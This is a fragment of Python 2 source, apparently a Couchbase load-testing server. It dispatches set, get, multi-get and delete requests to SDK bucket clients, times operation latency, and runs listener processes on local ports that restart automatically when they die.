def _get_set_args(self, data):
key = str(data['args'][0])
exp = int(data['args'][1])
flags = int(data['args'][2])
value = json.dumps(data['args'][3])
return key, exp, flags, value
def do_setq(self, args, client):
key, exp, flags, value = self._get_set_args(args)
client.setq(key,exp, flags, value)
return True
def get_op_latency(self, data):
# retrieve instance of sdk client
client = self.client_from_req(data)
# op_args pass in as tuple, i.e
# set => ('key', 0, 0, 'val')
op_args = data['args']
# select op
op = data['op']
if op == 'set':
op_args[3] = json.dumps(op_args[3])
func = client.set
if op == 'get':
func = client.get
if op == 'delete':
func = client.delete
# timed wrapper
start = time.time()
rc = func(*op_args) # exec
end = time.time()
latency = end - start
return latency
def do_set(self, data):
key, exp, flags, value = self._get_set_args(data)
client = self.client_from_req(data)
return client.set(key,exp, flags, value)
def do_get(self, data):
key = str(data['args'][0])
client = self.client_from_req(data)
client.get(key)
return key
def do_mget(self, data):
keys = data['args']
client = self.client_from_req(data)
for key in keys:
key = str(key)
client.getq(key)
# increment getq count
client.incr_pending_get_msgs(len(keys))
if client.pending_get_msgs > 400:
rc = client.recv_bulk_responses()
if len(rc) > 0:
for msg in rc:
if isinstance(msg, dict) and 'error' in msg and int(msg["error"]) != 0:
if int(msg["error"]) == 7:
client.reconfig_vbucket_map(forward=True)
if int(msg["error"]) == 134:
pass # temp failure (oom) ignore
else:
ts = time.localtime()
ts_string = "%s/%s/%s %s:%s:%s" %\
(ts.tm_year, ts.tm_mon, ts.tm_mday, ts.tm_hour, ts.tm_min, ts.tm_sec)
print "%s:get MemcachedError%d: %s" % (ts_string, msg["error"], msg["rv"])
client.pending_get_msgs = 0
else:
client.noop()
return True
def do_delete(self, data):
key = str(data['args'][0])
client = self.client_from_req(data)
res = client.delete(key)
return res
def do_mdelete(self, data):
keys = data['args']
results = []
client = self.client_from_req(data)
for key in keys:
key = str(key)
client.deleteq(key)
return True
def client_from_req(self, data, password = ""):
bucket = str(data["bucket"])
if "password" in data:
password = str(data["password"])
ip = data['cb_ip']
port = data['cb_port']
client = self.get_bucket_client(bucket, password, ip, port)
return client
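# Illustrative helper (added; not part of the original server): build the JSON
# body for a 'set' request in the shape exec_request()/do_set() above expect.
# Field names mirror client_from_req() and _get_set_args(); the bucket and
# Couchbase address defaults are placeholders. A caller is expected to send
# this body first and then send a single '\0' chunk so requestHandler() knows
# the request is complete and should be answered.
def _example_set_request(key, value, bucket = "default",
                         cb_ip = "127.0.0.1", cb_port = 8091):
    request = {"command": "set",
               "bucket": bucket,
               "cb_ip": cb_ip,
               "cb_port": cb_port,
               "args": [key, 0, 0, value]} # key, ttl, flags, value
    return json.dumps(request)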
def monitorSubprocesses():
# when any subprocess ends, attempt to restart
while True:
for port in processMap:
if not processMap[port]['process'].is_alive():
restart_listener(port)
time.sleep(1)
def restart_listener(port):
stop_listener(port)
start_listener(port)
def stop_listener(port):
process = processMap[port]["process"]
try:
print "sdk_%s: exiting" % (port)
process.terminate()
except Exception as ex:
print "sdk_%s: error occured termination %s" % (port, ex)
def start_listener(port):
p = Process(target=_run, args=(port,))
processMap[port] = {"process" : p,
"connected" : True,
"alt_nodes" : []}
print "sdk_%s: starting" % port
p.start()
def _run(port):
server = eventlet.listen(('127.0.0.1', port))
client_mgr = CouchClientManager(port)
while processMap[port]["connected"]:
new_sock, address = server.accept()
pool.spawn_n(client_mgr.requestHandler, new_sock)
if __name__ == '__main__':
for port in xrange(50008, 50012):
start_listener(port)
monitorSubprocesses()
|